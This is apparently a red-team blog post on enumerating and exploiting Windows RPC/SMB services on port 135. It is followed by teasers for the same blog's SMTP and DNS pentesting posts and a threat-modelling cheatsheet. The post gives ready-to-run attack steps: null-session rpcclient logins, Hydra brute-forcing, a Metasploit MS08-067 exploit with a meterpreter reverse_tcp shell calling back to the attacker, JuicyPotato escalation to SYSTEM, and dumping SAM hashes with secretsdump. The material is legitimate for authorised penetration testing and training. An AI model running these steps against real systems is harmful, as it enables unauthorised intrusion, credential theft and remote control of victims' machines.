Skip to main content

RPC Client Enumeration - Port 135

Pivoting for Red Teamers

Using rpcclient via Metasploit for Enumeration & Exploitation

rpcclient is a powerful tool used for enumerating and interacting with Windows RPC services. It is commonly used in penetration testing to extract usernames, groups, and policies from Windows machines.

Using rpcclient Manually (Without Metasploit)

If you already have valid credentials (or null session access), you can use rpcclient from Kali Linux:

rpcclient -U "" <TARGET_IP>

or

rpcclient -U "guest" <TARGET_IP>

🔹 If it prompts for a password, just press Enter to attempt a null session login.

Common Enumeration Commands


enumdomusers   # Enumerate domain users
queryuser <RID>  # Get user details (Replace <RID> with a user RID)
enumdomgroups  # Enumerate groups
querygroup <RID>  # Get group details
getsid  # Get security identifier (SID)
lookupnames <USERNAME>  # Get RID of a user

Using Metasploit’s rpcclient Modules

Step 1: Start Metasploit

msfconsole

Step 2: Use the SMB Login Module


use auxiliary/scanner/smb/smb_login
set RHOSTS <TARGET_IP>
set USERNAME <USER>
set PASSWORD <PASS>
run

✔ If it succeeds, you can use rpcclient with the valid credentials.

Step 3: Use auxiliary/scanner/smb/smb_enumusers


use auxiliary/scanner/smb/smb_enumusers
set RHOSTS <TARGET_IP>
set SMBDomain WORKGROUP
run

✔ This retrieves a list of valid Windows usernames via SMB.

Exploiting RPC Vulnerabilities

If RPC services are misconfigured or exploitable, you can try:

🔹 MS08-067 (EternalBlue Predecessor)


use exploit/windows/smb/ms08_067_netapi
set RHOST <TARGET_IP>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <YOUR_IP>
run

✔ This exploits an old SMB vulnerability, useful for legacy systems.

🔹 Other SMB/RPC Exploits

search rpc
search smb

Pro Tips for Effective Enumeration

  • Try null sessions (-U "") – Some systems allow unauthenticated access.
  • Use smbclient – To check for SMB shares:
smbclient -L //<TARGET_IP> -N
  • Brute-force with Hydra if needed:
hydra -L users.txt -P passwords.txt smb://<TARGET_IP>
  • Combine rpcclient + smbclient to extract more data before exploitation.

RPC Client Exploitation and Privilege Escalation

Understanding `enumprivs` in RPCClient

When you run the following command in rpcclient, it lists the privileges of the user:

rpcclient -U "USERNAME" "TARGET_IP"
enumprivs

If it returns 35 privileges, it indicates that the user has extensive permissions, some of which can be exploited for privilege escalation.

High-Risk Privileges (Privilege Escalation)

Privilege Name Description and Attack Scenario
SeImpersonatePrivilege Allows token impersonation; can be exploited using JuicyPotato/RoguePotato.
SeAssignPrimaryTokenPrivilege Allows assigning tokens to processes; useful for privilege escalation.
SeBackupPrivilege Allows reading all files, including sensitive registry hives (SAM and SYSTEM).

Exploiting Dangerous Privileges

If you find SeImpersonatePrivilege, you can try JuicyPotato for SYSTEM access:

msfconsole
use exploit/windows/local/juicypotato
set SESSION "SESSION_ID"
run

Extracting SAM Hashes (If `SeBackupPrivilege` is Present)

reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save

Then use `secretsdump.py`:

python3 secretsdump.py -sam sam.save -system system.save LOCAL

🔗 Conclusion

By analyzing the privileges returned by rpcclient, attackers can exploit misconfigurations and escalate privileges to SYSTEM using tools like JuicyPotato or by extracting registry hives.

Labels:

Comments

Post a Comment

Popular posts from this blog

SMTP (Simple Mail Transfer Protocol) Pentesting - Port 25

 SMTP (Simple Mail Transfer Protocol) is a communication protocol for electronic mail transmission.it is used for sending e-mail. POP3 or IMAP are used for receiving e-mail. Default ports are 25 (SMTP), 465 (SMTPS), 587 (SMTPS)   Connect We can use Telnet to connect to the remote server. Here is a command using Telnet: telnet example.com 25 Enumeration Identifying a SMTP Server You can use Nmap to check if there's an Telnet server on a target host like this: nmap -p25,465,587 -sV -Pn target.com Additional Nmap commands for enumeration nmap --script smtp-brute -p 25,465,587 "target-ip" nmap --script smtp-commands -p 25,465,587 "target-ip" nmap --script smtp-enum-users -p 25,465,587 "target-ip" nmap --script smtp-ntlm-info --script-args smtp-ntlm-info.domain=example.com -p 25,465,587 "target-ip" nmap --script smtp-vuln-cve2011-1764 -p 25,465,587 "target-ip" nmap --script smtp-* -p 25,465,587 "target-ip" Enumer...
Post a Comment
Read more

DNS Pentest - Port 53

Recon Banner Grabbing - Identify DNS Server Versions # Use dig to determine DNS server versions dig version.bind CHAOS TXT @DNS # Alternatively, use nmap script to grab the banner nmap --script dns-nsid <DNS_IP> # Alternatively, use telnet to grab the banner nc -nv -u <DNS_IP> 53 DNS Server Discovery # Using dig dig NS <target-domain> # Using nslookup nslookup -type=NS <target-domain> Enumeration Using DNS enum dnsenum --dnsserver <DNS_IP> --enum -p 0 -s 0 -o subdomains.txt -f <WORDLIST> <DOMAIN> Using dig # Query DNS records dig hackviser.com # Query specific type of DNS records (e.g., A record) dig A hackviser.com # Perform a reverse DNS lookup dig -x <IP_ADDRESS> # Query a specific DNS server dig @<DNS_SERVER_IP> hackviser.com Using nslookup # Perform DNS queries nslookup hackviser.com # Query a specific type of DNS record (e.g., MX record) nslookup -type=MX hackviser.com # Query a specific DNS server nslookup ha...
Post a Comment
Read more

Thread Modelling Cheatsheet: Know Your Weaknesses Before Attackers Do!

Threat Modelling Part - 1 What is Threat Modelling?      Threat modelling is the process of identifying, assessing, and mitigating potential security threats before they happen. It helps teams anticipate how systems can be attacked and build defences proactively , not reactively. Key Concepts Threat: Something (like a hacker or malware) that could exploit a weakness. Vulnerability: A flaw in your system that can be exploited. Risk: The chance that a threat will exploit a vulnerability to cause damage. Analogy : Threat = Burglar Vulnerability = Unlocked door Risk = Getting robbed because the door is open in a bad neighborhood  Threat Modelling Process (High-Level) Define the Scope – What systems/apps are you evaluating? Identify Assets – What needs protection? (e.g. data, services) Identify Threats – Think like an attacker. What could go wrong? Analyze Vulnerabilities – What weaknesses exist? Prioritize Ri...
Post a Comment
Read more